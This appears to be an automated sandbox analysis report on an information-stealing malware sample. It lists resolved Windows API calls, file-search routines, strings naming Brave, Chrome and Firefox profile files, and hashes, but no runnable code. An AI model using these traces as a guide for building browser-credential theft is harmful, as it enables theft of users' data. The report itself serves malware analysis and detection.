Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: fae13d5d1cff624b904f17cd6864bb78fc06fd2eca5d70893437f9510911d474
Instruction ID: ab1326cca0bc507a896836a357e3e3c3fc68cc1f44eccd01fb61e4483753a384
Opcode Fuzzy Hash: fae13d5d1cff624b904f17cd6864bb78fc06fd2eca5d70893437f9510911d474
Instruction Fuzzy Hash: 1D418C71A80604EBC718BBE5FC8DF9D7B74AB48B06F548269F50395190CAF4A541AB32

Function 00CB9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,007F3868), ref: 00CB98A1
GetProcAddress.KERNEL32(75900000,007F3880), ref: 00CB98BA
GetProcAddress.KERNEL32(75900000,007F39D0), ref: 00CB98D2
GetProcAddress.KERNEL32(75900000,007F39A0), ref: 00CB98EA
GetProcAddress.KERNEL32(75900000,007F3A18), ref: 00CB9903
GetProcAddress.KERNEL32(75900000,007F1328), ref: 00CB991B
GetProcAddress.KERNEL32(75900000,007EAE40), ref: 00CB9933
GetProcAddress.KERNEL32(75900000,007EAC40), ref: 00CB994C
GetProcAddress.KERNEL32(75900000,007F37F0), ref: 00CB9964
GetProcAddress.KERNEL32(75900000,007F38E0), ref: 00CB997C
GetProcAddress.KERNEL32(75900000,007F3988), ref: 00CB9995
GetProcAddress.KERNEL32(75900000,007F38B0), ref: 00CB99AD
GetProcAddress.KERNEL32(75900000,007EAD80), ref: 00CB99C5
GetProcAddress.KERNEL32(75900000,007F3940), ref: 00CB99DE
GetProcAddress.KERNEL32(75900000,007F38F8), ref: 00CB99F6
GetProcAddress.KERNEL32(75900000,007EAD00), ref: 00CB9A0E
GetProcAddress.KERNEL32(75900000,007F3910), ref: 00CB9A27
GetProcAddress.KERNEL32(75900000,007F39B8), ref: 00CB9A3F
GetProcAddress.KERNEL32(75900000,007EAC60), ref: 00CB9A57
GetProcAddress.KERNEL32(75900000,007F3B50), ref: 00CB9A70
GetProcAddress.KERNEL32(75900000,007EAC80), ref: 00CB9A88
LoadLibraryA.KERNEL32(007F3B68,?,00CB6A00), ref: 00CB9A9A
LoadLibraryA.KERNEL32(007F3B38,?,00CB6A00), ref: 00CB9AAB
LoadLibraryA.KERNEL32(007F3B80,?,00CB6A00), ref: 00CB9ABD
LoadLibraryA.KERNEL32(007F3B20,?,00CB6A00), ref: 00CB9ACF
LoadLibraryA.KERNEL32(007F3B08,?,00CB6A00), ref: 00CB9AE0
GetProcAddress.KERNEL32(75070000,007F3B98), ref: 00CB9B02
GetProcAddress.KERNEL32(75FD0000,007F3AD8), ref: 00CB9B23
GetProcAddress.KERNEL32(75FD0000,007F3AF0), ref: 00CB9B3B
GetProcAddress.KERNEL32(75A50000,007F3E20), ref: 00CB9B5D
GetProcAddress.KERNEL32(74E50000,007EADE0), ref: 00CB9B7E
GetProcAddress.KERNEL32(76E80000,007F1338), ref: 00CB9B9F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00CB9BB6

Strings

NtQueryInformationProcess, xrefs: 00CB9BAA

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 554d998e0f6e434cf98f705a9dc91df3fab8c3b9636cdb303ff029e9fe94f950
Instruction ID: e70c7daf81228ef985952e15bc709cf049de0610c50b8eb37611fef4ad6ff30c
Opcode Fuzzy Hash: 554d998e0f6e434cf98f705a9dc91df3fab8c3b9636cdb303ff029e9fe94f950
Instruction Fuzzy Hash: 8CA160B55002889FC358EFAAEDC89563BF9F74C30170D853EB605AB264E739B449CB16

Function 00CABE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

FindFirstFileA.KERNEL32(00000000,?,00CC0B32,00CC0B2B,00000000,?,?,?,00CC13F4,00CC0B2A), ref: 00CABEF5
StrCmpCA.SHLWAPI(?,00CC13F8), ref: 00CABF4D
StrCmpCA.SHLWAPI(?,00CC13FC), ref: 00CABF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 00CAC7BF
FindClose.KERNEL32(000000FF), ref: 00CAC7D1

Strings

Google Chrome, xrefs: 00CAC634
Preferences, xrefs: 00CAC11E
\Brave\Preferences, xrefs: 00CAC1DB
Brave, xrefs: 00CAC102

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 4d7e16968fe4ec151bcd8679641289e40135453936af9a8af370e3d8e0f65cb7
Instruction ID: 024c3f53a809763003baddd0b46f61885a1afcef14ed88f68237af2f7fc61781
Opcode Fuzzy Hash: 4d7e16968fe4ec151bcd8679641289e40135453936af9a8af370e3d8e0f65cb7
Instruction Fuzzy Hash: E8425572910108ABDB14FBB0DD96EED737DAF54300F404568F94AA6181EF34AF49DBA2

Function 6BAA35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6BB2F688,00001000), ref: 6BAA35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BAA35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6BAA35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BAA363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BAA369F
__aulldiv.LIBCMT ref: 6BAA36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6BAA3773
EnterCriticalSection.KERNEL32(6BB2F688), ref: 6BAA377E
LeaveCriticalSection.KERNEL32(6BB2F688), ref: 6BAA37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6BAA37C4
EnterCriticalSection.KERNEL32(6BB2F688), ref: 6BAA37CB
LeaveCriticalSection.KERNEL32(6BB2F688), ref: 6BAA3801
__aulldiv.LIBCMT ref: 6BAA3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6BAA3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6BAA3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6BAA394C

Strings

GenuntelineI, xrefs: 6BAA3639
GTC, xrefs: 6BAA3912
QPC, xrefs: 6BAA38FC
AuthcAMDenti, xrefs: 6BAA3946
MOZ_TIMESTAMP_MODE, xrefs: 6BAA35DB

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 2402f556647cda10efaab82929d1e8b6cf3d9a1c16a59de876f33492807d554d
Instruction ID: 471000ef39e760ac3d965514105f79e004a7eb4b62a19768767b5d21c9f8b01a
Opcode Fuzzy Hash: 2402f556647cda10efaab82929d1e8b6cf3d9a1c16a59de876f33492807d554d
Instruction Fuzzy Hash: 14B1BF71A083109FDB19DF29C94463ABBE6FB8A700F04892FE899D7350D739E844CB91

Function 00CB4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00CB492C
FindFirstFileA.KERNEL32(?,?), ref: 00CB4943
StrCmpCA.SHLWAPI(?,00CC0FDC), ref: 00CB4971
StrCmpCA.SHLWAPI(?,00CC0FE0), ref: 00CB4987
FindNextFileA.KERNEL32(000000FF,?), ref: 00CB4B7D
FindClose.KERNEL32(000000FF), ref: 00CB4B92

Strings

%s\%s, xrefs: 00CB49A4
%s\*, xrefs: 00CB4920
%s\%s, xrefs: 00CB49FB

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 59fc34ed68b2e2ea5a06462ed5d5b595f6dcd0b4874e8bf711b593af2457508f
Instruction ID: cadbe94404b9bead75d78ee1f977fdb4fecdbae3f86f1386aa82291b66d9fc94
Opcode Fuzzy Hash: 59fc34ed68b2e2ea5a06462ed5d5b595f6dcd0b4874e8bf711b593af2457508f
Instruction Fuzzy Hash: 986136B1900219AFCB24EFA1DC89FEA737CBB48700F04459CF549A6141EB75AB89CF91

Function 00CB3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00CB3EC3
FindFirstFileA.KERNEL32(?,?), ref: 00CB3EDA
StrCmpCA.SHLWAPI(?,00CC0FAC), ref: 00CB3F08
StrCmpCA.SHLWAPI(?,00CC0FB0), ref: 00CB3F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 00CB406C
FindClose.KERNEL32(000000FF), ref: 00CB4081

Strings

%s\%s, xrefs: 00CB3EB7

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 9cce99728a5826b9e4011345000bfc0d773442e6e52aa5f13d50a241f5dafd75
Instruction ID: 8fe0c1439db8ed198870def2eaae4282be8cbddcda29fd4db4438aab048248d7
Opcode Fuzzy Hash: 9cce99728a5826b9e4011345000bfc0d773442e6e52aa5f13d50a241f5dafd75
Instruction Fuzzy Hash: B15155B6900218AFCB24EBB0DC86EFA737CBB44300F04459DB659A6040DB75EB89CF95

Function 00CAF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CC15B8,00CC0D96), ref: 00CAF71E
StrCmpCA.SHLWAPI(?,00CC15BC), ref: 00CAF76F
StrCmpCA.SHLWAPI(?,00CC15C0), ref: 00CAF785
FindNextFileA.KERNELBASE(000000FF,?), ref: 00CAFAB1
FindClose.KERNEL32(000000FF), ref: 00CAFAC3

Strings

prefs.js, xrefs: 00CAF812

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
